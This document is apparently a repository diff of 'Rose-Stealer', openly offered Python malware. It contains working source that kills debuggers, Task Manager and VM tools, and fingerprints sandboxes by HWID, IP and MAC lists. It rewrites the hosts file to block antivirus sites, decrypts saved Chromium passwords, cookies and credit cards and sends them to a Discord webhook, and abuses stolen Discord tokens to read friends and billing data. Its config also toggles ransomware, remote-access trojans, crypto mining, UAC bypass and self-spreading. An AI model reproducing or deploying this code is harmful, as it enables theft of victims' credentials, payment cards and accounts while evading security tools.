PROCESSES = [
"http toolkit.exe",
"httpdebuggerui.exe",
"wireshark.exe",
"fiddler.exe",
"charles.exe",
"regedit.exe",
"cmd.exe",
"taskmgr.exe",
"vboxservice.exe",
"df5serv.exe",
"processhacker.exe",
"vboxtray.exe",
"vmtoolsd.exe",
"vmwaretray.exe",
"ida64.exe",
"ollydbg.exe",
"pestudio.exe",
"vmwareuser",
"vgauthservice.exe",
"vmacthlp.exe",
"x96dbg.exe",
"vmsrvc.exe",
"x32dbg.exe",
"vmusrvc.exe",
"prl_cc.exe",
"prl_tools.exe",
"qemu-ga.exe",
"joeboxcontrol.exe",
"ksdumperclient.exe",
"ksdumper.exe",
"joeboxserver.exe",
"xenservice.exe",
]
for proc in psutil.process_iter():
if any(procstr in proc.name().lower() for procstr in PROCESSES):
try:
proc.kill()
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass
def hwid_check():
HWIDS = [
"7AB5C494-39F5-4941-9163-47F54D6D5016",
"03DE0294-0480-05DE-1A06-350700080009",
"11111111-2222-3333-4444-555555555555",
"6F3CA5EC-BEC9-4A4D-8274-11168F640058",
"ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548",
"4C4C4544-0050-3710-8058-CAC04F59344A",
"00000000-0000-0000-0000-AC1F6BD04972",
"00000000-0000-0000-0000-000000000000",
"5BD24D56-789F-8468-7CDC-CAA7222CC121",
"49434D53-0200-9065-2500-65902500E439",
"49434D53-0200-9036-2500-36902500F022",
"777D84B3-88D1-451C-93E4-D235177420A7",
"49434D53-0200-9036-2500-369025000C65",
"B1112042-52E8-E25B-3655-6A4F54155DBF",
"00000000-0000-0000-0000-AC1F6BD048FE",
"EB16924B-FB6D-4FA1-8666-17B91F62FB37",
"A15A930C-8251-9645-AF63-E45AD728C20C",
"67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3",
"C7D23342-A5D4-68A1-59AC-CF40F735B363",
"63203342-0EB0-AA1A-4DF5-3FB37DBB0670",
"44B94D56-65AB-DC02-86A0-98143A7423BF",
"6608003F-ECE4-494E-B07E-1C4615D1D93C",
"D9142042-8F51-5EFF-D5F8-EE9AE3D1602A",
"49434D53-0200-9036-2500-369025003AF0",
"8B4E8278-525C-7343-B825-280AEBCD3BCB",
"4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",
"79AF5279-16CF-4094-9758-F88A616D81B4",
"FF577B79-782E-0A4D-8568-B35A9B7EB76B",
"08C1E400-3C56-11EA-8000-3CECEF43FEDE",
"6ECEAF72-3548-476C-BD8D-73134A9182C8",
"49434D53-0200-9036-2500-369025003865",
"119602E8-92F9-BD4B-8979-DA682276D385",
"12204D56-28C0-AB03-51B7-44A8B7525250",
"63FA3342-31C7-4E8E-8089-DAFF6CE5E967",
"365B4000-3B25-11EA-8000-3CECEF44010C",
"D8C30328-1B06-4611-8E3C-E433F4F9794E",
"00000000-0000-0000-0000-50E5493391EF",
"00000000-0000-0000-0000-AC1F6BD04D98",
"4CB82042-BA8F-1748-C941-363C391CA7F3",
"B6464A2B-92C7-4B95-A2D0-E5410081B812",
"BB233342-2E01-718F-D4A1-E7F69D026428",
"9921DE3A-5C1A-DF11-9078-563412000026",
"CC5B3F62-2A04-4D2E-A46C-AA41B7050712",
"00000000-0000-0000-0000-AC1F6BD04986",
"C249957A-AA08-4B21-933F-9271BEC63C85",
"BE784D56-81F5-2C8D-9D4B-5AB56F05D86E",
"ACA69200-3C4C-11EA-8000-3CECEF4401AA",
"3F284CA4-8BDF-489B-A273-41B44D668F6D",
"BB64E044-87BA-C847-BC0A-C797D1A16A50",
"2E6FB594-9D55-4424-8E74-CE25A25E36B0",
"42A82042-3F13-512F-5E3D-6BF4FFFD8518",
"38AB3342-66B0-7175-0B23-F390B3728B78",
"48941AE9-D52F-11DF-BBDA-503734826431",
"A7721742-BE24-8A1C-B859-D7F8251A83D3",
"3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E",
"D2DC3342-396C-6737-A8F6-0C6673C1DE08",
"EADD1742-4807-00A0-F92E-CCD933E9D8C1",
"AF1B2042-4B90-0000-A4E4-632A1C8C7EB1",
"FE455D1A-BE27-4BA4-96C8-967A6D3A9661",
"921E2042-70D3-F9F1-8CBD-B398A21F89C6",
"6AA13342-49AB-DC46-4F28-D7BDDCE6BE32",
"F68B2042-E3A7-2ADA-ADBC-A6274307A317",
"07AF2042-392C-229F-8491-455123CC85FB",
"4EDF3342-E7A2-5776-4AE5-57531F471D56",
"032E02B4-0499-05C3-0806-3C0700080009",
"11111111-2222-3333-4444-555555555555",
]
try:
HWID = subprocess.check_output(r"wmic csproduct get uuid", creationflags=0x08000000).decode().split("\n")[1].strip()
if HWID in HWIDS:
return True
except Exception:
pass
def ip_check():
try:
IPS = [
"None",
"88.132.231.71",
"78.139.8.50",
"20.99.160.173",
"88.153.199.169",
"84.147.62.12",
"194.154.78.160",
"92.211.109.160",
"195.74.76.222",
"188.105.91.116",
"34.105.183.68",
"92.211.55.199",
"79.104.209.33",
"95.25.204.90",
"34.145.89.174",
"109.74.154.90",
"109.145.173.169",
"34.141.146.114",
"212.119.227.151",
"195.239.51.59",
"192.40.57.234",
"64.124.12.162",
"34.142.74.220",
"188.105.91.173",
"109.74.154.91",
"34.105.72.241",
"109.74.154.92",
"213.33.142.50",
"109.74.154.91",
"93.216.75.209",
"192.87.28.103",
"88.132.226.203",
"195.181.175.105",
"88.132.225.100",
"92.211.192.144",
"34.83.46.130",
"188.105.91.143",
"34.85.243.241",
"34.141.245.25",
"178.239.165.70",
"84.147.54.113",
"193.128.114.45",
"95.25.81.24",
"92.211.52.62",
"88.132.227.238",
"35.199.6.13",
"80.211.0.97",
"34.85.253.170",
"23.128.248.46",
"35.229.69.227",
"34.138.96.23",
"192.211.110.74",
"35.237.47.12",
"87.166.50.213",
"34.253.248.228",
"212.119.227.167",
"193.225.193.201",
"34.145.195.58",
"34.105.0.27",
"195.239.51.3",
"35.192.93.107",
"213.33.190.22",
"194.154.78.152",
"20.114.22.115",
]
IP = requests.get("https://api.myip.com").json()["ip"]
if IP in IPS:
return True
except:
pass
def registry_check():
reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")
reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")
if reg1 != 1 and reg2 != 1:
return True
handle = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum")
try:
reg_val = winreg.QueryValueEx(handle, "0")[0]
if ("VMware" or "VBOX") in reg_val:
return True
finally:
winreg.CloseKey(handle)
def dll_check():
vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")
if os.path.exists(vmware_dll):
return True
if os.path.exists(virtualbox_dll):
return True
def specs_check():
try:
RAM = str(psutil.virtual_memory()[0] / 1024**3).split(".")[0]
DISK = str(psutil.disk_usage("/")[0] / 1024**3).split(".")[0]
if int(RAM) <= 2:
return True
if int(DISK) <= 50:
return True
if int(psutil.cpu_count()) <= 1:
return True
except:
pass
def proc_check():
processes = ["VMwareService.exe", "VMwareTray.exe"]
for proc in psutil.process_iter():
for program in processes:
if proc.name() == program:
return True
def mac_check():
try:
MACS = [
"05:17:5D:75:D5:54",
"00:03:47:63:8b:de",
"00:0c:29:05:d8:6e",
"00:0c:29:2c:c1:21",
"00:0c:29:52:52:50",
"00:0d:3a:d2:4f:1f",
"00:15:5d:00:00:1d",
"00:15:5d:00:00:a4",
"00:15:5d:00:00:b3",
"00:15:5d:00:00:c3",
"00:15:5d:00:00:f3",
"00:15:5d:00:01:81",
"00:15:5d:00:02:26",
"00:15:5d:00:05:8d",
"00:15:5d:00:05:d5",
"00:15:5d:00:06:43",
"00:15:5d:00:07:34",
"00:15:5d:00:1a:b9",
"00:15:5d:00:1c:9a",
"00:15:5d:13:66:ca",
"00:15:5d:13:6d:0c",
"00:15:5d:1e:01:c8",
"00:15:5d:23:4c:a3",
"00:15:5d:23:4c:ad",
"00:15:5d:b6:e0:cc",
"00:1b:21:13:15:20",
"00:1b:21:13:21:26",
"00:1b:21:13:26:44",
"00:1b:21:13:32:20",
"00:1b:21:13:32:51",
"00:1b:21:13:33:55",
"00:23:cd:ff:94:f0",
"00:25:90:36:65:0c",
"00:25:90:36:65:38",
"00:25:90:36:f0:3b",
"00:25:90:65:39:e4",
"00:50:56:97:a1:f8",
"00:50:56:97:ec:f2",
"00:50:56:97:f6:c8",
"00:50:56:a0:06:8d",
"00:50:56:a0:38:06",
"00:50:56:a0:39:18",
"00:50:56:a0:45:03",
"00:50:56:a0:59:10",
"00:50:56:a0:61:aa",
"00:50:56:a0:6d:86",
"00:50:56:a0:84:88",
"00:50:56:a0:af:75",
"00:50:56:a0:cd:a8",
"00:50:56:a0:d0:fa",
"00:50:56:a0:d7:38",
"00:50:56:a0:dd:00",
"00:50:56:ae:5d:ea",
"00:50:56:ae:6f:54",
"00:50:56:ae:b2:b0",
"00:50:56:ae:e5:d5",
"00:50:56:b3:05:b4",
"00:50:56:b3:09:9e",
"00:50:56:b3:14:59",
"00:50:56:b3:21:29",
"00:50:56:b3:38:68",
"00:50:56:b3:38:88",
"00:50:56:b3:3b:a6",
"00:50:56:b3:42:33",
"00:50:56:b3:4c:bf",
"00:50:56:b3:50:de",
"00:50:56:b3:91:c8",
"00:50:56:b3:94:cb",
"00:50:56:b3:9e:9e",
"00:50:56:b3:a9:36",
"00:50:56:b3:d0:a7",
"00:50:56:b3:dd:03",
"00:50:56:b3:ea:ee",
"00:50:56:b3:ee:e1",
"00:50:56:b3:f6:57",
"00:50:56:b3:fa:23",
"00:e0:4c:42:c7:cb",
"00:e0:4c:44:76:54",
"00:e0:4c:46:cf:01",
"00:e0:4c:4b:4a:40",
"00:e0:4c:56:42:97",
"00:e0:4c:7b:7b:86",
"00:e0:4c:94:1f:20",
"00:e0:4c:b3:5a:2a",
"00:e0:4c:b8:7a:58",
"00:e0:4c:cb:62:08",
"00:e0:4c:d6:86:77",
"06:75:91:59:3e:02",
"08:00:27:3a:28:73",
"08:00:27:45:13:10",
"12:1b:9e:3c:a6:2c",
"12:8a:5c:2a:65:d1",
"12:f8:87:ab:13:ec",
"16:ef:22:04:af:76",
"1a:6c:62:60:3b:f4",
"1c:99:57:1c:ad:e4",
"1e:6c:34:93:68:64",
"2e:62:e8:47:14:49",
"2e:b8:24:4d:f7:de",
"32:11:4d:d0:4a:9e",
"3c:ec:ef:43:fe:de",
"3c:ec:ef:44:00:d0",
"3c:ec:ef:44:01:0c",
"3c:ec:ef:44:01:aa",
"3e:1c:a1:40:b7:5f",
"3e:53:81:b7:01:13",
"3e:c1:fd:f1:bf:71",
"42:01:0a:8a:00:22",
"42:01:0a:8a:00:33",
"42:01:0a:8e:00:22",
"42:01:0a:96:00:22",
"42:01:0a:96:00:33",
"42:85:07:f4:83:d0",
"4e:79:c0:d9:af:c3",
"4e:81:81:8e:22:4e",
"52:54:00:3b:78:24",
"52:54:00:8b:a6:08",
"52:54:00:a0:41:92",
"52:54:00:ab:de:59",
"52:54:00:b3:e4:71",
"56:b0:6f:ca:0a:e7",
"56:e8:92:2e:76:0d",
"5a:e2:a6:a4:44:db",
"5e:86:e4:3d:0d:f6",
"60:02:92:3d:f1:69",
"60:02:92:66:10:79",
"7e:05:a3:62:9c:4d",
"90:48:9a:9d:d5:24",
"92:4c:a8:23:fc:2e",
"94:de:80:de:1a:35",
"96:2b:e9:43:96:76",
"a6:24:aa:ae:e6:12",
"ac:1f:6b:d0:48:fe",
"ac:1f:6b:d0:49:86",
"ac:1f:6b:d0:4d:98",
"ac:1f:6b:d0:4d:e4",
"b4:2e:99:c3:08:3c",
"b4:a9:5a:b1:c6:fd",
"b6:ed:9d:27:f4:fa",
"be:00:e5:c5:0c:e5",
"c2:ee:af:fd:29:21",
"c8:9f:1d:b6:58:e4",
"ca:4d:4b:ca:18:cc",
"d4:81:d7:87:05:ab",
"d4:81:d7:ed:25:54",
"d6:03:e4:ab:77:8e",
"ea:02:75:3c:90:9f",
"ea:f6:f1:a2:33:76",
"f6:a5:41:31:b2:78",
]
MAC = str(getmac.get_mac_address())
if MAC in MACS:
return True
except:
pass

38
Rose-Stealerv1/resources/source/old/block_sites.py Normal file
View File

@@ -0,0 +1,38 @@
# Entire code from https://github.com/blank-c/blank-grabber!
# Go give him some love.
import os
import subprocess
def block_sites():
call = subprocess.run("REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath", shell=True, capture_output=True)
if call.returncode != 0:
hostdirpath = os.path.join("System32", "drivers", "etc")
else:
hostdirpath = os.sep.join(call.stdout.decode(errors="ignore").strip().splitlines()[-1].split()[-1].split(os.sep)[1:])
hostfilepath = os.path.join(os.getenv("systemroot"), hostdirpath, "hosts")
if not os.path.isfile(hostfilepath):
return
with open(hostfilepath) as file:
data = file.readlines()
BANNED_SITES = ("virustotal.com", "avast.com", "totalav.com", "scanguard.com", "totaladblock.com", "pcprotect.com", "mcafee.com", "bitdefender.com", "us.norton.com", "avg.com", "malwarebytes.com", "pandasecurity.com", "avira.com", "norton.com", "eset.com", "zillya.com", "kaspersky.com", "usa.kaspersky.com", "sophos.com", "home.sophos.com", "adaware.com", "bullguard.com", "clamav.net", "drweb.com", "emsisoft.com", "f-secure.com", "zonealarm.com", "trendmicro.com", "ccleaner.com")
newdata = []
for i in data:
if any([(x in i) for x in BANNED_SITES]):
continue
else:
newdata.append(i)
for i in BANNED_SITES:
newdata.append("\t0.0.0.0 {}".format(i))
newdata.append("\t0.0.0.0 www.{}".format(i))
newdata = "\n".join(newdata).replace("\n\n", "\n")
subprocess.run("attrib -r {}".format(hostfilepath), shell=True, capture_output=True) # Removes read-only attribute from hosts file
with open(hostfilepath, "w") as file:
file.write(newdata)
subprocess.run("attrib +r {}".format(hostfilepath), shell=True, capture_output=True) # Adds read-only attribute to hosts file

342
Rose-Stealerv1/resources/source/old/browser.py Normal file
View File

@@ -0,0 +1,342 @@
# Entire code from https://github.com/addi00000/empyrean!
# Go give him some love.
import base64
import datetime
import json
import os
import shutil
import sqlite3
from pathlib import Path
from zipfile import ZipFile
from bin.config import Config
from Crypto.Cipher import AES
from discord import Embed, File, SyncWebhook
from win32crypt import CryptUnprotectData
cc = Config()
__LOGINS__ = []
__COOKIES__ = []
__WEB_HISTORY__ = []
__DOWNLOADS__ = []
__CARDS__ = []
main_path = os.path.join(os.getenv("APPDATA"), "roseontop")
class Browsers:
def __init__(self, webhook):
self.webhook = SyncWebhook.from_url(webhook)
Chromium()
Upload(self.webhook)
class Upload:
def __init__(self, webhook: SyncWebhook):
self.webhook = webhook
self.write_files()
self.send()
self.clean()
def write_files(self):
os.makedirs(os.path.join(main_path, "vault"), exist_ok=True)
if __LOGINS__:
with open(os.path.join(main_path, "vault", "logins.txt"), "w", encoding="utf-8") as f:
f.write("\n".join(str(x) for x in __LOGINS__))
if __COOKIES__:
with open(os.path.join(main_path, "vault", "cookies.txt"), "w", encoding="utf-8") as f:
f.write("\n".join(str(x) for x in __COOKIES__))
if __WEB_HISTORY__:
with open(os.path.join(main_path, "vault", "web_history.txt"), "w", encoding="utf-8") as f:
f.write("\n".join(str(x) for x in __WEB_HISTORY__))
if __DOWNLOADS__:
with open(os.path.join(main_path, "vault", "downloads.txt"), "w", encoding="utf-8") as f:
f.write("\n".join(str(x) for x in __DOWNLOADS__))
if __CARDS__:
with open(os.path.join(main_path, "vault", "cards.txt"), "w", encoding="utf-8") as f:
f.write("\n".join(str(x) for x in __CARDS__))
with ZipFile(os.path.join(main_path, "vault.zip"), "w") as zip:
for file in os.listdir(os.path.join(main_path, "vault")):
zip.write(os.path.join(main_path, "vault", file), file)
def send(self):
self.webhook.send(embed=Embed(title="Vault", description="```" + "\n".join(self.tree(Path(os.path.join(main_path, "vault")))) + "```", timestamp=datetime.datetime.utcnow(), color=cc.get_color()), file=File(os.path.join(main_path, "vault.zip")), username=cc.get_name(), avatar_url=cc.get_avatar())
def clean(self):
shutil.rmtree(os.path.join(main_path, "vault"))
os.remove(os.path.join(main_path, "vault.zip"))
def tree(self, path: Path, prefix: str = "", midfix_folder: str = "📂 - ", midfix_file: str = "📄 - "):
pipes = {
"space": " ",
"branch": "",
"tee": "├── ",
"last": "└── ",
}
if prefix == "":
yield midfix_folder + path.name
contents = list(path.iterdir())
pointers = [pipes["tee"]] * (len(contents) - 1) + [pipes["last"]]
for pointer, path in zip(pointers, contents):
if path.is_dir():
yield f"{prefix}{pointer}{midfix_folder}{path.name} ({len(list(path.glob('**/*')))} files, {sum(f.stat().st_size for f in path.glob('**/*') if f.is_file()) / 1024:.2f} kb)"
extension = pipes["branch"] if pointer == pipes["tee"] else pipes["space"]
yield from self.tree(path, prefix=prefix + extension)
else:
yield f"{prefix}{pointer}{midfix_file}{path.name} ({path.stat().st_size / 1024:.2f} kb)"
class Chromium:
def __init__(self):
self.appdata = os.getenv("LOCALAPPDATA")
self.browsers = {
"amigo": self.appdata + "\\Amigo\\User Data",
"torch": self.appdata + "\\Torch\\User Data",
"kometa": self.appdata + "\\Kometa\\User Data",
"orbitum": self.appdata + "\\Orbitum\\User Data",
"cent-browser": self.appdata + "\\CentBrowser\\User Data",
"7star": self.appdata + "\\7Star\\7Star\\User Data",
"sputnik": self.appdata + "\\Sputnik\\Sputnik\\User Data",
"vivaldi": self.appdata + "\\Vivaldi\\User Data",
"google-chrome-sxs": self.appdata + "\\Google\\Chrome SxS\\User Data",
"google-chrome": self.appdata + "\\Google\\Chrome\\User Data",
"epic-privacy-browser": self.appdata + "\\Epic Privacy Browser\\User Data",
"microsoft-edge": self.appdata + "\\Microsoft\\Edge\\User Data",
"uran": self.appdata + "\\uCozMedia\\Uran\\User Data",
"yandex": self.appdata + "\\Yandex\\YandexBrowser\\User Data",
"brave": self.appdata + "\\BraveSoftware\\Brave-Browser\\User Data",
"iridium": self.appdata + "\\Iridium\\User Data",
}
self.profiles = [
"Default",
"Profile 1",
"Profile 2",
"Profile 3",
"Profile 4",
"Profile 5",
]
for _, path in self.browsers.items():
if not os.path.exists(path):
continue
self.master_key = self.get_master_key(f"{path}\\Local State")
if not self.master_key:
continue
for profile in self.profiles:
if not os.path.exists(path + "\\" + profile):
continue
operations = [
self.get_login_data,
self.get_cookies,
self.get_web_history,
self.get_downloads,
self.get_credit_cards,
]
for operation in operations:
try:
operation(path, profile)
except Exception as e:
# print(e)
pass
def get_master_key(self, path: str) -> str:
if not os.path.exists(path):
return
if "os_crypt" not in open(path, "r", encoding="utf-8").read():
return
with open(path, "r", encoding="utf-8") as f:
c = f.read()
local_state = json.loads(c)
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def decrypt_password(self, buff: bytes, master_key: bytes) -> str:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def get_login_data(self, path: str, profile: str):
login_db = f"{path}\\{profile}\\Login Data"
if not os.path.exists(login_db):
return
shutil.copy(login_db, "login_db")
conn = sqlite3.connect("login_db")
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
if not row[0] or not row[1] or not row[2]:
continue
password = self.decrypt_password(row[2], self.master_key)
__LOGINS__.append(Types.Login(row[0], row[1], password))
conn.close()
os.remove("login_db")
def get_cookies(self, path: str, profile: str):
cookie_db = f"{path}\\{profile}\\Network\\Cookies"
if not os.path.exists(cookie_db):
return
try:
shutil.copy(cookie_db, "cookie_db")
conn = sqlite3.connect("cookie_db")
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies")
for row in cursor.fetchall():
if not row[0] or not row[1] or not row[2] or not row[3]:
continue
cookie = self.decrypt_password(row[3], self.master_key)
__COOKIES__.append(Types.Cookie(row[0], row[1], row[2], cookie, row[4]))
conn.close()
except Exception as e:
print(e)
os.remove("cookie_db")
def get_web_history(self, path: str, profile: str):
web_history_db = f"{path}\\{profile}\\History"
if not os.path.exists(web_history_db):
return
shutil.copy(web_history_db, "web_history_db")
conn = sqlite3.connect("web_history_db")
cursor = conn.cursor()
cursor.execute("SELECT url, title, last_visit_time FROM urls")
for row in cursor.fetchall():
if not row[0] or not row[1] or not row[2]:
continue
__WEB_HISTORY__.append(Types.WebHistory(row[0], row[1], row[2]))
conn.close()
os.remove("web_history_db")
def get_downloads(self, path: str, profile: str):
downloads_db = f"{path}\\{profile}\\History"
if not os.path.exists(downloads_db):
return
shutil.copy(downloads_db, "downloads_db")
conn = sqlite3.connect("downloads_db")
cursor = conn.cursor()
cursor.execute("SELECT tab_url, target_path FROM downloads")
for row in cursor.fetchall():
if not row[0] or not row[1]:
continue
__DOWNLOADS__.append(Types.Download(row[0], row[1]))
conn.close()
os.remove("downloads_db")
def get_credit_cards(self, path: str, profile: str):
cards_db = f"{path}\\{profile}\\Web Data"
if not os.path.exists(cards_db):
return
shutil.copy(cards_db, "cards_db")
conn = sqlite3.connect("cards_db")
cursor = conn.cursor()
cursor.execute("SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards")
for row in cursor.fetchall():
if not row[0] or not row[1] or not row[2] or not row[3]:
continue
card_number = self.decrypt_password(row[3], self.master_key)
__CARDS__.append(Types.CreditCard(row[0], row[1], row[2], card_number, row[4]))
conn.close()
os.remove("cards_db")
class Types:
class Login:
def __init__(self, url, username, password):
self.url = url
self.username = username
self.password = password
def __str__(self):
return f"{self.url}\t{self.username}\t{self.password}"
def __repr__(self):
return self.__str__()
class Cookie:
def __init__(self, host, name, path, value, expires):
self.host = host
self.name = name
self.path = path
self.value = value
self.expires = expires
def __str__(self):
return f'{self.host}\t{"FALSE" if self.expires == 0 else "TRUE"}\t{self.path}\t{"FALSE" if self.host.startswith(".") else "TRUE"}\t{self.expires}\t{self.name}\t{self.value}'
def __repr__(self):
return self.__str__()
class WebHistory:
def __init__(self, url, title, timestamp):
self.url = url
self.title = title
self.timestamp = timestamp
def __str__(self):
return f"{self.url}\t{self.title}\t{self.timestamp}"
def __repr__(self):
return self.__str__()
class Download:
def __init__(self, tab_url, target_path):
self.tab_url = tab_url
self.target_path = target_path
def __str__(self):
return f"{self.tab_url}\t{self.target_path}"
def __repr__(self):
return self.__str__()
class CreditCard:
def __init__(self, name, month, year, number, date_modified):
self.name = name
self.month = month
self.year = year
self.number = number
self.date_modified = date_modified
def __str__(self):
return f"{self.name}\t{self.month}\t{self.year}\t{self.number}\t{self.date_modified}"
def __repr__(self):
return self.__str__()

176
Rose-Stealerv1/resources/source/old/config.py Normal file
View File

@@ -0,0 +1,176 @@
class Config:
def __init__(self):
self.webhook = "WEBHOOK_URL"
self.debug_mode = False
self.rose_discord_rat = False
self.rose_discord_rat_socket_link = "ROSE_DISCORD_RAT_SOCKET_LINK"
self.knight_discord_rat = False
self.knight_discord_rat_bot_token = "KNIGHT_DISCORD_RAT_BOT_TOKEN"
self.knight_discord_rat_channel_id = "KNIGHT_DISCORD_RAT_CHANNEL_ID"
self.knight_discord_rat_listener_user_id = "KNIGHT_DISCORD_RAT_LISTENER_USER_ID"
self.knight_discord_rat_prefix = "KNIGHT_DISCORD_RAT_PREFIX"
self.ransomware = False
self.ransomware_email_adress = "RANS0MWARE_EMAIL"
self.ransomware_monero_wallet_adress = "RANSOMWARE_MONERO_ADRESS_"
self.ransomware_discord_webhook_url = "RANSOMWARE_WEBHOOKURL"
self.ransomware_amount_of_money = "RANSOMWARE_AMOUNT_0F_MONEY"
self.discord_ping = False
self.injection = False
self.token_stealing = False
self.browser_stealing = False
self.deviceinf_stealing = False
self.ipinf_stealing = False
self.roblox_stealing = False
self.screenshot = False
self.start_up = False
self.xmr_miner = False
self.xmr_adress = "wallet_adressss"
self.fake_error = False
self.nitro_auto_buy = False
self.uac_bypass = False
self.antivm = False
self.webcam = False
self.spread_malware = False
self.spread_malware_msg = "SPRMALWARE_MSFG"
self.rose_melt_stub = False
self.games = False
self.ts_bsod = False
self.bbcrash = False
self.disable_protectors = False
self.block_sites = False
self.eb_color = 16711680
self.eb_footer = "Rose-Stealer | t.me/rosegrabber"
self.wh_avatar = "https://raw.githubusercontent.com/DamagingRose/Rose-Grabber/main/resources/assets/Rose.png"
self.wh_name = "Rose-Stealer | t.me/rosegrabber"
def get_roblox_stealing(self):
return self.roblox_stealing
def get_injection(self):
return self.injection
def get_token_stealing(self):
return self.token_stealing
def get_browser_stealing(self):
return self.browser_stealing
def get_deviceinf_stealing(self):
return self.deviceinf_stealing
def get_ipinf_stealing(self):
return self.ipinf_stealing
def get_webhook(self):
return self.webhook
def get_color(self):
return self.eb_color
def get_footer(self):
return self.eb_footer
def get_debug_mode(self):
return self.debug_mode
def get_avatar(self):
return self.wh_avatar
def get_name(self):
return self.wh_name
def get_rose_discord_rat(self):
return self.rose_discord_rat
def get_rose_discord_rat_link(self):
return self.rose_discord_rat_socket_link
def get_knight_discord_rat(self):
return self.knight_discord_rat
def get_knight_discord_rat_bot_token(self):
return self.knight_discord_rat_bot_token
def get_knight_discord_rat_channel_id(self):
return self.knight_discord_rat_channel_id
def get_knight_discord_rat_listener_user_id(self):
return self.knight_discord_rat_listener_user_id
def get_knight_discord_rat_prefix(self):
return self.knight_discord_rat_prefix
def get_discord_ping(self):
return self.discord_ping
def get_screenshot(self):
return self.screenshot
def get_start_up(self):
return self.start_up
def get_xmr_miner(self):
return self.xmr_miner
def get_xmr_adress(self):
return self.xmr_adress
def get_fake_error(self):
return self.fake_error
def get_nitro_auto_buy(self):
return self.nitro_auto_buy
def get_uac_bypass(self):
return self.uac_bypass
def get_antivm(self):
return self.antivm
def get_webcam(self):
return self.webcam
def get_ransomware_email_adress(self):
return self.ransomware_email_adress
def get_ransomware_amount_of_money(self):
return self.ransomware_amount_of_money
def get_ransomware_monero_wallet_adress(self):
return self.ransomware_monero_wallet_adress
def get_ransomware_discord_webhook_url(self):
return self.ransomware_discord_webhook_url
def get_ransomware(self):
return self.ransomware
def get_spread_malware(self):
return self.spread_malware
def get_spread_malware_msg(self):
return self.spread_malware_msg
def get_rose_melt_stub(self):
return self.rose_melt_stub
def get_games(self):
return self.games
def get_tsbsod(self):
return self.ts_bsod
def get_bbcrash(self):
return self.bbcrash
def get_disable_protectors(self):
return self.disable_protectors
def get_block_sites(self):
return self.block_sites

324
Rose-Stealerv1/resources/source/old/discordc.py Normal file
View File

@@ -0,0 +1,324 @@
from json import loads, dumps
from urllib.request import Request, urlopen
from bin.config import Config
cc = Config()
from bin.ipinf import Info
ifx = Info()
from datetime import datetime
class DiscordX:
def __init__(self):
self.webhook = cc.get_webhook()
if cc.get_debug_mode:
print("Discord Init")
@staticmethod
def GetUHQFriends(token):
badgeList = [
{
"Name": "Early_Verified_Bot_Developer",
"Value": 131072,
"Emoji": "<:developer:874750808472825986> ",
},
{
"Name": "Bug_Hunter_Level_2",
"Value": 16384,
"Emoji": "<:bughunter_2:874750808430874664> ",
},
{
"Name": "Early_Supporter",
"Value": 512,
"Emoji": "<:early_supporter:874750808414113823> ",
},
{
"Name": "House_Balance",
"Value": 256,
"Emoji": "<:balance:874750808267292683> ",
},
{
"Name": "House_Brilliance",
"Value": 128,
"Emoji": "<:brilliance:874750808338608199> ",
},
{
"Name": "House_Bravery",
"Value": 64,
"Emoji": "<:bravery:874750808388952075> ",
},
{
"Name": "Bug_Hunter_Level_1",
"Value": 8,
"Emoji": "<:bughunter_1:874750808426692658> ",
},
{
"Name": "HypeSquad_Events",
"Value": 4,
"Emoji": "<:hypesquad_events:874750808594477056> ",
},
{
"Name": "Partnered_Server_Owner",
"Value": 2,
"Emoji": "<:partner:874750808678354964> ",
},
{
"Name": "Discord_Employee",
"Value": 1,
"Emoji": "<:staff:874750808728666152> ",
},
]
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
}
try:
friendlist = loads(
urlopen(
Request(
"https://discord.com/api/v6/users/@me/relationships",
headers=headers,
)
)
.read()
.decode()
)
except Exception:
return False
uhqlist = ""
for friend in friendlist:
OwnedBadges = ""
flags = friend["user"]["public_flags"]
for badge in badgeList:
if flags // badge["Value"] != 0 and friend["type"] == 1:
if "House" not in badge["Name"]:
OwnedBadges += badge["Emoji"]
flags = flags % badge["Value"]
if OwnedBadges != "":
uhqlist += f"{OwnedBadges} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
@staticmethod
def GetBilling(token):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
}
try:
billingjson = loads(
urlopen(
Request(
"https://discord.com/api/users/@me/billing/payment-sources",
headers=headers,
)
)
.read()
.decode()
)
except Exception:
return False
if billingjson == []:
return "`None`"
billing = ""
for methode in billingjson:
if methode["invalid"] is False:
if methode["type"] == 1:
billing += "<:credit_card:1151916484176654416>"
elif methode["type"] == 2:
billing += "<:paypal:1151916071092244520> "
return billing
@staticmethod
def GetBadge(flags):
if flags == 0:
return ""
OwnedBadges = ""
badgeList = [
